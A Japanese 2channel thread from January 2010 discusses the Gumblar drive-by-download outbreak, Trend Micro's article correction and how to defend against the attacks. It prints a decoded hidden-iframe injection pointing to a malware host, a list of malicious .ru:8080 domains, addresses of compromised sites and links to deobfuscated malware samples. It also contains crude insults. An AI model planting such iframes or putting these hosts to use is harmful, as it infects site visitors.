>>480とりあえずwhoisからめる

大丈夫にゃんだろか。

ねるねるねるね

501:名無しさん@お腹いっぱい。
10/01/24 04:10:54

  \           ■■          / 
   \         ■■■      \∧∧∧∧∧∧∧∧∧∧∧∧∧∧/ 
     \       ■■■■      < ━    ╋       ┓   ┃> 
      \     ■■■■    /< ━┓   ╋   ┃   ┃  ┃> 
        \   ■■☆■■  /  <  ┃ ┏╋━  ┃   ┃   > 
         \  ■■■■■/   <  ┃ ┗┛    ┗      ・> 
          彡|  ━  ━ |ミ   /∨∨∨∨∨∨∨∨∨∨∨∨∨\  
         彡彡|─◎─◎─|ミミ   
  ───彡彡| ┌└ ┐ |ミミ──────── 
         彡彡| ──  |ミミミ 
        彡彡彡\\二/ /ミミミ   テーレッテレー♪
        彡彡彡▲\__/▲ミミミ   
       /彡彡▲■■■■■▲ミミ\     ねっておいしい
     / 彡彡 ■■■■■■■ミミ  \     ねるねるね~るね♪

502:名無しさん@お腹いっぱい。
10/01/24 07:17:50
> ガンブラー再燃を契機にセキュリティの基本を見直そう
> URLリンク(itpro.nikkeibp.co.jp)

俺たちの誤解なんだってさ

> ■変更履歴
> 記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクション
> によるものだという誤解を招く表現があったため、これを修正しました。
> [2010/1/22 15:40]


記念にDiffておくよ

*****【旧】
 ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLインジェクションによるものだと推測しています。
*****【改】
 一般的に、Web改ざんの手口はWebアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のガンブラー攻撃によるWeb改ざんにも、SQLインジェクションが使われた可能性があると推測しています
*****

*****【旧】
 まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです。
*****【改】
 まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口にはSQLインジェクションが使われている可能性があるためです。
*****

*****【旧】
*****【改】
■変更履歴
記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクションによるものだという誤解を招く表現があったため、これを修正しました。
[2010/1/22 15:40]
*****

503:名無しさん@お腹いっぱい。
10/01/24 07:24:22
修正されてもまだ誤解されそうだな。
どう見てもSQLインジェクションと関連付けたがってるようにしか見えない。

504:名無しさん@お腹いっぱい。
10/01/24 07:28:40
念のため貼っとく

> 大辞林 第二版 (三省堂)
>
> ごかい 【誤解】
>
> (名)スル
>
> 事実や言葉などを誤って理解すること。思い違い。
> 「真意を―する」「―を招く」


505:名無しさん@お腹いっぱい。
10/01/24 07:41:11
>>475
トレンドマイクロ醜態をさらしたなw
だいたい固定コンテンツしかないようなサイトまで被害にあってる時点でSQLインジェクション説は微妙なのにね

506:名無しさん@お腹いっぱい。
10/01/24 07:43:21
>>502
セキュリティー企業なのにトレンドマイクロアホすぎるだろ
素人がやってんのか?

507:名無しさん@お腹いっぱい。
10/01/24 08:17:50
>>505
htmlのような静的なコンテンツしか置けないGeocitysでも起こってるから100%あり得ない

508:名無しさん@お腹いっぱい。
10/01/24 08:44:15
   ,,v‐v-/l_  (⌒)
  _「/ ̄  く   /
  lYノノ/_ノl_ヽ))
  <イ( l l )l>  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 <|)'|l、"(フノ|l  < えっちのような性的なコンテンツはいけないと思います!
  ,(ヨリ<>o<>リ']  \______________
  |ト‐!]-ム- i']l
  ヽ_ノv__l/ /
.  ノ[//‐─‐/_/、
 ( /E|,   (フlヨ \
 ,-| El___lヨ /
└-\`^^^^^^´/

509:名無しさん@お腹いっぱい。
10/01/24 08:55:32
トレンドマイクロのWebサイト改ざん、Webアプリにぜい弱性の可能性
URLリンク(itpro.nikkeibp.co.jp)

ここから時計が止まってるんだ
きっとそうに違いない

510:名無しさん@お腹いっぱい。
10/01/24 08:56:57
例の上映団体RCS

>一部のセキュリティソフトにおいて、
>当ホームページへのアクセス遮断や、
>感染警告の表示などが発生している様です。
>早急な対応を試みておりますが、
>じゅうぶんご注意ください。

改竄されてました,とは意地でも書かないのね

511:名無しさん@お腹いっぱい。
10/01/24 09:21:45
ちょっとここでずらずらっとタイムラインを自分的に整理だらだらと羅列してみました。

恥ずかしいので Hide ::

まず、最初に事態が発生したのは 2009年3月ごろ
lite~.cnとかいう変なドメインから
"drive by download"なる攻撃手法が発生しました。

当初、原因ははっきりせず、
やがて Adobe Flash/Readerの「最新版では塞がれている脆弱性」を
つかった自動マルウェア埋め込みの手法であることが判明しました。

これは、当時としては「なにタワゴト言ってるんだ」というレベルの
「Webを見ただけで感染」という手法であり、あまりそれを信用してもらえず、
セキュリティ各社もあまり報道せず、事態は水面下で流れていきます。

そして、運命の 2009.04.05 PC通販ショップのGENOで感染が確認され、
一度は感染コードの除去が行われたにもかかわらず、
再感染というセンセーショナルな事態を引き起こします。

GENOが感染した際には gumblar.cnではなく、
zlkon.lv(94.247.2.195 as hs.2-195.zlkon.lv)でした。
このときには単純な難読化コードに jQuery.js への誘導コードが記述され、
さらにそこからドライブ・バイ・ダウンロード攻撃のためのリンクに飛ばされました。

GENOが事あるごとに叩かれるのは、
「コンピュータを売ってる店がそんな認識でいいのか?」という部分と
「キャッシュを消せば大丈夫」ってあたり(笑)だとおもいますけど、

同時期に感染した楽天系の2つの店はもっと対応が酷かったことは
あまりしられておらず、
私的には 「GENOウィルス」という呼称は好きではアリマセン。

512:名無しさん@お腹いっぱい。
10/01/24 09:23:48
>>511
ここで重要なことは従来言われていた
「怪しいサイトにいかなければ大丈夫」という神話が
崩壊したことです。

普通一般のどこにでもあるサイトが
ある日突然、陥落して毒を吐き出すようになる
というのは想像すらしていなかった
攻撃ベクトルになりました。

その後、94.247.2.195は応答停止となり、
終焉したかにおもわれましたが、
わずかのブランクの後、
初代Gumblar(Gumblar/Martuz)として凱旋してきました。
このとき、初めて事態の深刻さがわかりました。

初期の zlkon の攻撃時に「インストール」されていたマルウェアは
潜伏中に感染ノードからありとあらゆる情報を盗み、
一番有効な撹拌手段として、
FTPアカウントを盗んでサイトを改ざんし、
さらに感染者を増やすというねずみ講的手法に転じたのです。

しかも、このねずみ講には、大きな違いがありました。

zlkon.lv時代になかった
「感染しない環境には普通のコードを返す」という
逆発想的rootkit手法を導入したのです。

更にはIP制限により、一度マルウェアをダウンロードした相手には
一定期間配布しないという「ケチ政策」も施行されました。

513:名無しさん@お腹いっぱい。
10/01/24 09:26:13
>>512
これにより、感染する可能性の低い環境には何も起きず、
脆弱性のある環境への「無差別ターゲット型」攻撃という
言語的にもにアリエナイ攻撃手法が確立しました。

この手法により脆弱性を放置していた環境にのみ爆発的に広まり、
かつ、普通にセキュリティ意識の高いユーザは何が起きているのかわからず、
セキュリティ会社は検体を取得できないという、
きわめて皮肉な結果が更なるパンデミックを引き起こしたのです。

しかも、この勤勉なマルウェア作者はほとんど毎日のように、
javascriptコード、マルウェア本体の更新を行い、
セキュ会社とのイタチゴッコなせめぎ合いの主導権を握り続けました。

このとき、悔やまれることは zlkon.lvのテイクダウンの際に、
(ITパスポートのCMをうつ金があるなら)
きちんとした対応策を
IPAあたりが音頭を取って報道等で告知していれば、
こんな事態になることはなかったのではないか?と思われることです。

しかし、まだこのときは救いがありました。

gumblar.cnもmartuz.cnも、単独のIPであり、
極端なことを言えばたった3つのIPを塞いでしまえば、
この攻撃は無効化されたのです。

そして、このことをいまだに引きずって
「危険なIP/TLDを塞げば大丈夫」という
幻想を生む皮肉な結果になりました。

514:名無しさん@お腹いっぱい。
10/01/24 09:29:04
>>513
一方、攻撃手法として確立してしまった
ドライブ・バイ・ダウンロードは、
ますます嫌な進化を続け、
8080ポートへのリバースプロキシを悪用した攻撃が
水面下で進行していました。

この攻撃は、細かいスパンで切り替わる
5基のラウンドロビンを使った大量のドメイン投入で、
名称がつけられないまま 8080(仮)として、
延々とラウンドロビンを差し替えながら
感染ノードを増やしていました。

やがて、この 8080系も姿を消したかに見えた矢先の
2009年11月、
ScanSafeとKasperskyが突然アラートを発し、
「Gumblar復活」の烽火を上げたのです。

この新しいGumblar(Gumblar.X)は、
以前の gumblarよりも更に洗練された攻撃で、
その恐ろしく緻密に計算された陥落サイト群のヒエラルキー構成により、
幾つものBOTが、複数の役目を絡み合いながら機能する、
超並列Botサーバとなっていました。

しかし、この攻撃に使用されていた脆弱性は、
既に塞がれていたものばかりで、
これまで散々脅されていたユーザは
きちんと Adobe系の穴を塞いでいたため、
それほど深刻な事態にはなりませんでした。

515:名無しさん@お腹いっぱい。
10/01/24 09:31:44
>>514
ところが、その背後で 8080系が古くい癖に極めて有効な
Java JREの脆弱性を取り入れ、
一気に感染ノードを広げにかかりました。

これは、日本において
メーカ販売のPCに「プリインストール」されており、
かつ自動更新の手続きがとられていないものが多いため、
一気に日本で拡散する原因となりました。

また、マルウェア誘導コードに有名な日本のドメインが
サブドメイン名やフォルダ名に羅列され、
ホワイトリストと単純なORチェックを行っている
IDSではスルーされてしまうという
悲惨な状況も確認されています。

しかも悪いことに
12月初旬に Adobe Readerの脆弱性が公表、
PoCが公開されたにもかかわらず

あー長かった。
というわけで、
もしウチ的に "Gumblar"って何?と応えるとするなら
「いやなもの」
ということでどうでしょう(殴)

UnderForge of Lack ≫ Blog Archive ≫ 2010.01.23 土曜日
URLリンク(www3.atword.jp)

516:名無しさん@お腹いっぱい。
10/01/24 09:32:35
無理に小難しくひけらかし系文章書かなくてもいいから

517:名無しさん@お腹いっぱい。
10/01/24 09:43:33
ふかいい話だな

518:名無しさん@お腹いっぱい。
10/01/24 09:54:08
他人に何かを伝えるつもりが微塵もない、
単なるこれ見よがしな知識披露目的のオナニー記事だな。

519:名無しさん@お腹いっぱい。
10/01/24 09:59:26
ヲタクなんてそんなもんだ

520:名無しさん@お腹いっぱい。
10/01/24 10:04:24
>>511-519
自演乙

521:名無しさん@お腹いっぱい。
10/01/24 10:13:30
>>520
ブログ主さん乙

とでも返されればご満足ですか?

522:名無しさん@お腹いっぱい。
10/01/24 10:14:13
結局このウィルスの目的は、Web改ざんがしたかったの?
サイトの機密情報を盗みたかったの?

523:名無しさん@お腹いっぱい。
10/01/24 10:15:25
botnetの構築

524:名無しさん@お腹いっぱい。
10/01/24 10:17:29
>>510
なにこれ、頭にくる文章だな…

525:名無しさん@お腹いっぱい。
10/01/24 10:22:01
読みにくいけど情報は正しいよね。
これを例のSQLインジェクション野郎に読ませるべき

526:名無しさん@お腹いっぱい。
10/01/24 10:23:47
並列処理させるSETIみたいなもんか

527:名無しさん@お腹いっぱい。
10/01/24 10:31:12
>>520
オナニープレイかよ死ね

528:名無しさん@お腹いっぱい。
10/01/24 10:33:51
今思ったんだけどトレンドの人はconfickerと間違ったのでは。

529:名無しさん@お腹いっぱい。
10/01/24 10:59:36
トレンドマイクロはバカでも課長になれます(キリッ

530:名無しさん@お腹いっぱい。
10/01/24 11:18:10
>>527
違うよ。

531:名無しさん@お腹いっぱい。
10/01/24 11:27:42
この課長は上がってきた報告書をこねくりまわして発表するのが仕事?
そもそも解析結果を理解できてるとは思えないんですけど
だめじゃん

532:名無しさん@お腹いっぱい。
10/01/24 11:28:20
>>502
いっそのこと「最初からSQL云々なんて書いてない!ガンブラにやられて改ざんされたっ、
悔しいビクンビクン!、このように完璧の防御を誇るITProの高性能サーバまでハッキングする
恐ろしいウィルスなのであ~る!」とか書いとけばいいのに。

.ru:8080コレクション
ampsguide anycitytown authentictype burkewebservices carswebnet easylifedirect
freeprosports funwebmail guidebat genuinehollywood genuinecolors
halfsite homeproair homesaleplus lagworld saletradeonline suesite sugaryhome
superaguide superpropicks theatticsale theaworld thechocolateweb
thelaceweb themobilewindow themobisite viewhomesale webdesktopnet
webdirectbroker webnetenglish webnetloans webnetenglish whosaleonline
worldsouth worldwebworld yourtruemate

きりがないなw 俺も8080ポートをアク禁するだけにしようかな

533:名無しさん@お腹いっぱい。
10/01/24 11:45:18
>>532
むしろ、80と443のみ許可で

534:名無しさん@お腹いっぱい。
10/01/24 12:04:00
>>515のつづきってあるの?
そこに書いてあるアドレスに書いてあるの?
無関係?

知らないアドレスは踏みたくないんだけど続きがあるなら見たい。

535:名無しさん@お腹いっぱい。
10/01/24 12:17:21
無理して踏まなくていいですよ

536:名無しさん@お腹いっぱい。
10/01/24 12:19:59
p://yamataiyou●sakura.ne●jp/

ここをFirefoxのview-sourceで表示して、それを、ファイル>名前を付けてページを保存>
ファイルの種類は「Web ページ、HTML のみ」で保存してvirustotalすると
結果: 10/41 (24.4%)になるのだが、俺はhtmlとかにあまり詳しくないので
単純にIframeに反応した誤検出なのかどうかが良く分からない

URLリンク(www.virustotal.com)

537:名無しさん@お腹いっぱい。
10/01/24 12:29:15
>>536
GumblarChecker 2にかけたら、avastがプァーン
HTML:IFrame-GC [Trj]

538:名無しさん@お腹いっぱい。
10/01/24 12:50:15
>>536
<iframe name=c10 src='p://●net/.go/check.html' width=262 height=196 style='visibility:hidden'></iframe>
アスキーコード埋め込みでそのあとurlエンコードしたら上記が出てきた
誤検知っぽい

539:名無しさん@お腹いっぱい。
10/01/24 12:59:20
>>538
すまん、ドメイン検索するとウイルス配布サイトらしいな
gogo2me●net

540:536
10/01/24 13:11:21
回答くれた>>537>>538>>539ありがとう
gogo2me●netでぐぐると結構出てくるね

541:名無しさん@お腹いっぱい。
10/01/24 13:58:42
URLリンク(japan.cnet.com)
所詮、トレンドマイクロの社員はこの程度ですから・・・

542:名無しさん@お腹いっぱい。
10/01/24 14:02:48
>>491
感染後に予防しても意味ないわ
風邪ひいた後にみかん食ったって治らないだろ

543:名無しさん@お腹いっぱい。
10/01/24 14:29:13
まっ、神経質になってるのは最初のうちだけだと思うけどね^^;
インフルエンザの時もマスクしてたのは最初だけだったし^^;

まっ基本的(手洗いうがい=最新のパッチ)なことは気にするようになったんじゃないの

無神経な奴は、何があったも気にしないから無理かも^^;

544:名無しさん@お腹いっぱい。
10/01/24 14:32:49
>>541
サクサク軽快~♪ サクサク軽快~♪ ウイルスバスター!!
販売本数No.1!! 選んだ貴方は・・・

パソコン\(^o^)/オワタ


545:名無しさん@お腹いっぱい。
10/01/24 15:02:56
ウイルスバスター(笑)が売れているのは日本ぐらいだろ・・・

546:名無しさん@お腹いっぱい。
10/01/24 15:18:26
BCNランキング2009年12月 - セキュリティソフト
URLリンク(bcnranking.jp)

547:名無しさん@お腹いっぱい。
10/01/24 15:59:45
NTTのやついれてるけど
これはタダならまあいいよね

カスペノートンアバストfセキュレ色々入れてウイルスかかったことなんかないからわからんけど

548:名無しさん@お腹いっぱい。
10/01/24 16:07:00
kidsparlour●biz/
www●kidsparlour●net/
まだ対処してませんね


549:名無しさん@お腹いっぱい。
10/01/24 16:15:00
古いホームページだから放置するんじゃね

550:名無しさん@お腹いっぱい。
10/01/24 16:15:59
cometruestar.ru

551:名無しさん@お腹いっぱい。
10/01/24 16:26:33
www●minami-aoyamama●info
こんなとこもまだ


552:名無しさん@お腹いっぱい。
10/01/24 16:33:43
今朝VIPで騒いでいたやつ
www●deeplove2●com/index_2.html

553:名無しさん@お腹いっぱい。
10/01/24 16:40:10 BE:201170742-PLT(12031)
URLリンク(www.virustotal.com)

URLリンク(www.dotup.org)

新種っぽいの

554:名無しさん@お腹いっぱい。
10/01/24 16:59:15 BE:1584217679-PLT(12031)
URLリンク(www.virustotal.com)
URLリンク(www.dotup.org)
本体

555:名無しさん@お腹いっぱい。
10/01/24 18:21:13 BE:301756043-PLT(12031)
URLリンク(www.dotup.org)
virus
解析して難読化解除・コメント追加したもの

メールの内容を盗んだり色々してるね

556:名無しさん@お腹いっぱい。
10/01/24 18:38:15

だけど553と554のファイル内容一緒だ

557:名無しさん@お腹いっぱい。
10/01/24 18:48:21 BE:150878232-PLT(12031)
>>556
あら・・本当だスマン
554はこれね URLリンク(www.dotup.org)
555にWinampの~て書いてあるけどあれは間違えてた、正しくはDirectShowの脆弱性を使うものだ

558:名無しさん@お腹いっぱい。
10/01/24 19:34:03
どもです。
まあ見てもわけわからんのですが、一般人は現状の対策でおkってことでいいの?

559:名無しさん@お腹いっぱい。
10/01/24 19:38:55
おk

560:名無しさん@お腹いっぱい。
10/01/24 19:40:54
読んでわかったことは・・
・古いIEだとヤヴァイ、ネット上にある任意のexeファイルを実行可能
・IEはActiveXを実行しないようにしたらすべて回避可能
 ([インターネットオプション]から[セキュリティ]タブの[インターネット]ゾーンのセキュリティレベルを[高]にするだけ)
・IE以外はJavaを切れば回避可能
・Flashは使われてない

561:名無しさん@お腹いっぱい。
10/01/24 19:48:08
日々変化しているし1パターンだけじゃなかったはず
今回偶然使ってなかっただけだろうから
例えば他スレで使ってないと断言するのは危ないよ

562:名無しさん@お腹いっぱい。
10/01/24 19:53:43
どっちにしても>>6を行っておけば問題ないのは変わらない。

563:名無しさん@お腹いっぱい。
10/01/24 19:54:20
まあそうだがこれだけはいえる
”IEは使わない方が良い”

コードの9割がActiveX依存、ActiveXを除けば残るのはJavaのみ

564:名無しさん@お腹いっぱい。
10/01/24 19:56:54
>>560
俺も読んでも分からない人なのだけど

> ・古いIEだとヤヴァイ

古いってIE6とかのバージョンっていう意味?

565:名無しさん@お腹いっぱい。
10/01/24 20:02:04 BE:100585722-PLT(12031)
>>564
IE6はまだサポート期間内だからパッチが提供されてるのでアップデートをきちんとしていれば大丈夫、してないなら危険
IE5.5以前は危険

566:名無しさん@お腹いっぱい。
10/01/24 20:03:56
>>565
了解。回答ありがとう

567:名無しさん@お腹いっぱい。
10/01/24 20:37:13
www●forms-inc●com/nicoletti/

よく分からないんだが、
ここ開こうとしたらNODに止められたんだけど、
ガンブラー感染してるって事?


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch